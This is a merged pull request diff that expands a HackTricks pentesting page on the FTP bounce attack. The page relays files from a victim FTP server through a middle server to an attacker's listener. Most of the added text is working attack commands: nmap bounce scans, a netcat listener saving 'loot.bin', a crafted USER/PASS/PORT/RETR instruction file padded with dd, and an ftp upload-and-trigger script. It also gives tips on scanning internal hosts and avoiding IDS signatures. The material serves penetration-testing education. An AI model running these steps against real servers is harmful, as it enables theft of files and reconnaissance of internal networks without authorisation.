Merge pull request #1883 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-ftp_ftp-bounce-download-2oftp-file_20260211_132335

Research Update Enhanced src/network-services-pentesting/pen...

Author: carlospolop

src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md

@@ -5,29 +5,98 @@
 
 ## Resume
 
-If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server.
+If you have access to a **bounce FTP server**, you can make it request files of **another FTP server** (where you know some credentials) and download that file to **your own server**.
 
 ## Requirements
 
-- FTP valid credentials in the FTP Middle server
-- FTP valid credentials in Victim FTP server
-- Both server accepts the PORT command \(bounce FTP attack\)
-- You can write inside some directory of the FRP Middle server
-- The middle server will have more access inside the Victim FTP Server than you for some reason \(this is what you are going to exploit\)
+- FTP valid credentials in the **FTP Middle server**
+- FTP valid credentials in **Victim FTP server**
+- Both servers **accept the `PORT` command** (bounce FTP attack)
+- You can **write** inside some directory of the **FTP Middle server**
+- The middle server has **more access** inside the Victim FTP Server than you
 
 ## Steps
 
-1. Connect to your own FTP server and make the connection passive \(pasv command\) to make it listen in a directory where the victim service will send the file
-2. Make the file that is going to send the FTP Middle server t the Victim server \(the exploit\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
-3. Connect to the FTP Middle Server and upload de previous file
-4. Make the FTP Middle server establish a connection with the victim server and send the exploit file
-5. Capture the file in your own FTP server
-6. Delete the exploit file from the FTP Middle server
+1. Connect to **your own FTP server** and make the connection passive (`pasv` command) so it **listens** in a directory where the victim service will send the file.
+2. Craft the file the FTP Middle server will send to the Victim server (the **exploit script**). This file will be plain text with the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
+3. Connect to the **FTP Middle Server** and upload the previous file.
+4. Make the FTP Middle server **establish a connection** with the Victim server and send the exploit file.
+5. **Capture** the file in your own FTP server.
+6. **Delete** the exploit file from the FTP Middle server.
 
-For a more detailed information check the post: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
+## Quick check for vulnerable bounce hosts
 
+- **Nmap** still supports FTP bounce checks. Example to verify a potential middle server:
 
-{{#include ../../banners/hacktricks-training.md}}
+```bash
+nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
+# or directly attempt a bounce scan
+nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>
+```
+
+If the server refuses third‑party `PORT` values the scan will fail; some **embedded/legacy printers, NAS and appliance FTP daemons** still allow it.
+
+## Automating the 2nd FTP download
+
+Below is a modernized way to pull a file through a vulnerable middle FTP server.
+
+1. **Open a passive listener** on your attack box (any TCP sink works):
+   ```bash
+   nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server
+   ```
+
+2. **Note** your IP as `A,B,C,D` and port `P` as `p1,p2` (`p1 = P/256`, `p2 = P%256`).
+
+3. **Build the instruction file** that the middle server will replay to the victim:
+   ```bash
+   cat > instrs <<'EOF'
+   USER <victim_user>
+   PASS <victim_pass>
+   CWD /path/inside/victim
+   TYPE I
+   PORT A,B,C,D,p1,p2
+   RETR secret.tar.gz
+   QUIT
+   EOF
+   # Add padding so the control channel stays open on picky daemons
+   dd if=/dev/zero bs=1024 count=60 >> instrs
+   ```
+
+4. **Upload & trigger from the middle server** (classic proxy FTP):
+   ```bash
+   ftp -n <middle_ftp> <<'EOF'
+   user <middle_user> <middle_pass>
+   put instrs
+   PORT <victim_ip_with_commas>,0,21
+   RETR instrs
+   QUIT
+   EOF
+   ```
 
+5. **Grab the file** from your listener (`loot.bin`).
+6. **Clean up** the uploaded `instrs` file on the middle server.
 
+Notes:
+- Padding (`dd ...`) prevents the control connection from closing before the RETR finishes (large TCP window issue discussed in classic writeups).
+- Any service that can **listen and dump TCP** can replace the FTP PASV socket (e.g., `socat -u TCP-LISTEN:2121,fork - > loot.bin`).
+- If the middle server restricts privileged ports, use a high port in `PORT` and adjust your listener accordingly.
 
+## Extra tricks
+
+- Use a bounceable FTP server to **port-scan internal hosts** when file relay is blocked:
+  ```bash
+  nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
+  ```
+- Some modern WAF/IDS (e.g., Juniper IPS) ship signatures specifically for **FTP:EXPLOIT:BOUNCE-ATTACK**; noisy payloads or missing padding may trip them.
+- When the middle server enforces "PORT to same host" restrictions, place your **listener on the middle server itself** (if you have write/execute) and forward the captured file later.
+
+For a more detailed old-school walkthrough check: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
+
+
+
+
+## References
+
+- [Nmap book – TCP FTP Bounce Scan (-b)](https://nmap.org/book/scan-methods-ftp-bounce-scan.html)
+- [CPTS Attacking Common Services – FTP Bounce example (2025)](https://www.chaostudy.com/2025/02/24/cpts-attacking-common-services/)
+{{#include ../../banners/hacktricks-training.md}}